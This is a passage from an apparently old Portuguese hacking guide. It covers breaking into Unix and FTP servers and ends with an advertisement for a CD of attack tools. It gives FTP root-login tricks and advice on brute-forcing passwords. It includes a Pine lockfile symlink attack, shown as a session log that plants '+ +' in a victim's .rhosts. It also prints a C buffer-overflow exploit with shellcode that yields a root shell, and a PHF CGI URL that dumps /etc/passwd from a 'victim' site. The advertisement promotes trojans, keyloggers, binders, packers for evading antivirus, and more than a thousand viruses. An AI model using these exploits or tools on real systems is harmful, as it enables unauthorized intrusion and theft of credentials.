O senha do root aparece com um asterisco por causa do shadow mas o shadow esta r para
voc. Normalmente /etc/shadow est escondido como /etc/.shadow
Diretrios que comeam com ponto . So diretrios ocultos.
Se o .shadow no estiver na diretrio etc, voc precisa procurar e o arquivo passwd pode estar
com outro nome.

/etc/shadow /etc/shadow /etc/shadow /etc/shadow
podem conter senhas como vimos anteriormente

/etc/group /etc/group /etc/group /etc/group
Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.

/usr/adm/loginlog
Aqui ficam os Logs, horrios de entradas e sadas dos usurios.
As vazes podem estar em /usr/adm/acct/loginlog
E as vezes nem encontrado, alguns servidores desativam este servio.

/usr/mail/<nomedousuario> : /usr/mail/<nomedousuario> : /usr/mail/<nomedousuario> : /usr/mail/<nomedousuario> :
Aqui fica o MAIL do usurio, para voc ler esse arquivo voc tem de
ser o root ou o prprio usurio.

/upload ou /cache /upload ou /cache /upload ou /cache /upload ou /cache
Aqui ficam gravados arquivos temporrios que os usurios ou mesmo o
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou
a cada semana. Em muitos servers nao existe esse diretrio.

/bin : /bin : /bin : /bin :
Neste diretrio ficam os comandos do server e as shells. Cuidado.


SENHAS E EXPLOITS SENHAS E EXPLOITS SENHAS E EXPLOITS SENHAS E EXPLOITS

Login annimo
user: anonymous
pass: eu@dominio

Logar como root (somente em servidores com falha)

quote user ftp
quote cwd ~root
quote pass ftp

quote user ftp
quote cwd ~sys
quote pass ftp

quote user ftp
quote cwd ~sysop
quote pass ftp




Diretorio das senhas :
(As senhas estaro criptografadas)
/etc/passwd
.shadow (procure este diretrio oculto)






Decriptografando uma senha

Exemplo de senha criptografada:
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Para decriptografarmos precisaremos de um decripter, pesquisem sobre decrypter passwd ftp


Quebrando uma senha de FTP
Quando voc no pode acessar o arquivo passwd.txt e no consegue a senha criptogafada,
significa que a segurana do servidor muito boa ou voc muito ruim =)
Ai s usando os mtodos Lamer um deles o Brute Force.
Brute force significa fora bruta existem vrios programas de brute force, o funcionamento
simples, o programa gera inmeras combinaes de senhas at achar uma que logue. Voc
tambm pode usar uma Word list (uma lista com as senhas mais comuns) junto com o Bute
Force. Um exemplo de programa o Brutus


Exploits UNIX


Exploiter sem duvida a melhor forma de hackear um servidor, mas muito mais complicado,
impossvel voc entender um exploiter se voc no souber programar.
Um exploit um programa que voc cria e faz ele rodar dentro do servidor exploranda falhas e te
levando root.
Eu achei um timo exemplo de exploit que roda via telnet, o PINE EXPLOIT

Vendo o processo da tabela com ps voc pode ver os usurio rodando o pine. Um ento pode
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usurio. Vendo o processo da tabela
de novo vai revelar quais usuarios ou saem com mensagens no lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contm. Agora precisa fazer um " echo "+ +" >

/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00
grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Esse o ultimo que vou relacionar aqui.
Exploitation script para vunerabilidade ppp.

#include #include #include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL;
char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i); ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i];

addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr; *ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root.



Dicas de exploits em UNIX
Estes so exploits usando comandos bsicos de Unix, eu nem chamaria de exploits mas legal
para comear a estudar.
Procurar por arquivos ocultos
find / -name ".. " -print -xdev
find / -name ".*" -print -xdev |cat -v
Procurar por todos os diretrios com permisso de gravar (R)
find / -perm -0777 -type -d -ls


Procurando arquivos setuid no filesystem
Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000
find / -type f -perm -4000 -exec ls -l {} \;

Procurar por todos os arquivos setgid no filesystem.
find / -group root -perm -2000 -exec ls -ldb {} \;


BUG de PHF
Este exploit muito antigo, muito dificio achar um servidor desatualizado.
Basta colocar o exploit no seu navegador.Exploit:
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
ele mostrar o diretrio das senhas, voc coloca o exploit na frende da URL do site, exemplo:
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd










Principais Falhas de FTP
- No existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas
faciomente com um sniffer.
- Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google
consegue localizar estes arquivos, por exemplo:
Digite filetype:ini ws_ftp pwd no google, voc vai ver a quantidade de arquivos expostos.
- Tem gente que ainda deixa root sem senha
- Como os navegadores interagem com FTP, link de download direto, voc pode invadir um
FTP e linkar os arquivos para download, tipo:
ftp://dominio/diretorios/arquivo
Login annimo, deixa voc navegar pelo servidor e visualizar dados que podem te elevar a root








Como vocs pedem notar isto o bsico. No parem de estudar, e principalmente compartilhar
informao.
Se quiserem entrar em contato comigo para tirar alguma dvida:

Email:
rackerox@webexploiter.com

MSN
rackerox@hotmail.com

Praga de Orkut:
http://www.orkut.com/Profile.aspx?uid=4380671928865807152














CD ROOM HACKING TOOLS

O Hacking Tools um CD de softwares voltado para quem gosta de Hacking em informtica.

No apenas mais um CD de programas de invaso, nele vc encontra suporte para Redes, Programao,
Comunicao de dados, TCP/IP, Scans, Exploiters, etc..Tambm tem os trojans e keyllogers .Resumindo todos os
tipos de programas que vc precisa para se tornar um hacker de verdade, e no apenas mais um Lamer que sabe rouba
senha com KL e invadir por cookies =)

No CD tem uma descrio de cada tipo de programa, e cada programa vem com um "readme" sobre o seu
funcionamento.

Para comprar o CD entre no site:
www.cdhackingtools.com
Conteudo do CD:

Redes/Internet
-Emita Pacotes UDP (com opo de tamanho de Buffer) para qualquer porta
-Programas para conexo remota ( com suporte para diferentes roteadores )
-Faa uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou atravs da Internet.
-Altere o seu endereo MAC
-Capture informaes de sua rede, conexes so estabelecidas, chats, etc. e monitore tudo distancia via email.
-Verifique o status de qualquer servidor na internet
-Faa do seu computador um servidor de internet.
-Capture todas as informaes do trfego de sua rede/conexo.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e tambm senhas protegidas por asteriscos (til para senhas de
wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faa DNS Spoofing ( redirecione qualquer endereo de site para o site que voc quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faa um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... so vrios programas de snifers, scans, telnet, etc.



Exploiters/Scans
Um exploit, um programa com uma poro de dados ou uma sequncia de comandos que se aproveita das
vulnerabilidades de um sistema computacional como o prprio sistema operativo ou servios de interao de protocolos
(ex: servidores Web). So geralmente elaborados por hackers como programas de demonstrao das vulnerabilidades, a
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso no autorizado a sistemas.

Trojans Backdoors
Um meio secreto ou no documentado de invadir um sistema de computador .
Trojan backdoor um programa que age como a lenda do cavalo de tria. entrando no computador , e liberando uma
porta para um possvel invasor.
Os trojans atuais so divididos em duas partes: o servidor e o cliente Normalmente, o servidor est oculto em algum outro
arquivo e, no momento que esse arquivo executado, o servidor se instala e se oculta no computador da vtima; a partir
deste momento, o computador pode ser acessado pelo cliente, que ir enviar informaes para o servidor executar certas
operaes no computador da vtima.
Resumindo :
Servidor o vrus trojan que vai se instalar no pc da vtima
Cliente o programa que esta no seu pc
E vc precisa de um endereo para conectar o servidor ao cliente ,este endereo o IP


Keyloggers
Keylogger (que significa registrador do teclado em ingls) um programa de computador cuja finalidade monitorar tudo
o que digitado.Instalado no computador sem o conhecimento da vtima o keylogger captura dados sensveis e os envia a
um cracker.Neste CD existe Keyloggers que so programveis para enviar os logs para o email de uma pessoa.

Bruteforces
(Fora Bruta): tcnica de intruso de sistemas que se baseia em tentativa e erro. So geradas palavras e a combinao
destas com em nomes de usurios e senhas tentada exaustivamente at que um usurio vlido seja
encontrado.Ferramentas para fora bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom

IP Scans
Procure portas abertas e falhas de seguranas de um determinado IP ou uma faixa de IP especfica.
Obtenha resoluo de host names, checagem de portas abertas, varredura de mquinas mortas, varreduras de mltiplas
portas. Faa scans at de IP que no respondem ao ping.
Procure trojans instalados em uma determinada faixa de IP.

Nuckers
Nuke o nome atribudo a programas que finalizam
prematuramente com uma conexo TCP atravs do envio
de pacotes ICMP com mensagens de erro. Tais pacotes
podem ser direcionadas para o servidor (server side nuke)
ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com a
conexo fazendo com que o cliente ou o servidor sejam
enganados por uma mensagem de erro que normalmente
indicaria um problema de conexo entre os dois.

Binders
Ferramenta que combina dois ou mais arquivos em um s, geralmente, com o fim de ocultar um deles. Um binder compila
a lista selecionada em um arquivo host, que poder ser renomeado. Arquivo host um programa simples compilado e
personalizado que ir descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados so
automaticamente descompactados e executados. Quando um cavalo de Tria est vinculado ao Notepad, por exemplo, a
sua aparncia e execuo iro se assemelhar ao Notepad, mas o cavalo de Tria tambm ser executado

Criptografia
Programas de codificao e Decodificao de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.

Programaao
O CD contem varias ferramentas de programao.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programao em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalao etc.

Compiladores
Compiladores so programas que permitem transformar cdigos escrito na linguagem de programao usada em
linguagem de mquina, gerando o binrio que pode ser executado.
No CD contem compiladores de C C++ Assesmbler Perl

Resource
Modifique, extraia e insira Resources em executveis, voc pode mudar totalmente um programa de 32 bits .Voc pode
mudar caixas de dilogo, cones e outras coisas.



Conversores
Corverta vrios formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, udio e vdeo para exe, swf para exe, decompilador de flash,
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).

Compressores
Compressores so programas que executa partes do cdigo ao mesmo nivel de prioridade que o sistema operacional
permite supervisar e controlar as aplicaes executadas. Excelente para que voc esconda seus virus de modo que o
antivirus no detecte.

Compactadores
So programas que usam certas tcnicas para criar um arquivo, que contm vrios arquivos e/ou pastas compactados.No
cd contem os programas Winrar, Winzip e UPX

Ferramentas web
Ferramentas para voc usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .

Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco,
manuteno do sistema, proteo de arquivos, etc.

Vrus
Um vrus de computador nada mais do que um programa que fica residente na memria do microcomputador , e de
acordo com determinados parmetros executa uma ao (normalmente danosa)o cd contem mais de 1000 virus, Virus
Builders, arquivos de batch.

Msn/orkut
So mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vdeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood.
Faa um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibio, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automtica quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que voc digitar em link de
pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.

Servidores
Servidor um sistema de computao que fornece servios a uma rede de computadores tanto rede local como internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,
SSH e PERL.
Hospede seu site em seu prprio computador.

Clientes
Programas que acessam os servios de um servidor. Telnet, SSH

Segurana
Programas para ajudar na sua segurana, no um kit de anti vrus.
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares,
Monitore a segurana de seu computador distancia.
Crie um emulador de terminal Telnet e SSH.

Ferramentas gerais
Recupere senhas, Altere cones, resete senha do usurio, crie seus prprios auto executveis, monitor de webcan,
gerenciador de uploads

Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windows
Sistemas operacionais
Programas que rodam do pen drive
Cdigos fontes do:
Secure Internet Communication Sute.
Crack Whore 2.2 (Fonte do programa feito para testar a segurana dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.





EQUIPE HALL OF HACKERS EQUIPE HALL OF HACKERS EQUIPE HALL OF HACKERS EQUIPE HALL OF HACKERS
A Hall of Hackers foi criada em dezembro de 2006.
Nosso intuito NO promover nenhum tipo de prtica maliciosa.
O conhecimento hacker infelizmente ainda muito restrito e visto com preconceito, ns da Hall
of Hackers somos inteiramente a favor da liberdade de informao.
Hacker no quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou
seja, quem realmente estuda.

Nossa comunidade
http://www.orkut.com/Community.aspx?cmm=22006772

NOSSOS PROGETOS:


Orkut Community Hall of Hackers


CD Room de Softwares www.cdhackingtools.com


Scan On Line www.webexploiter.com


Blog Hacking http://insecuritynet.blogspot.com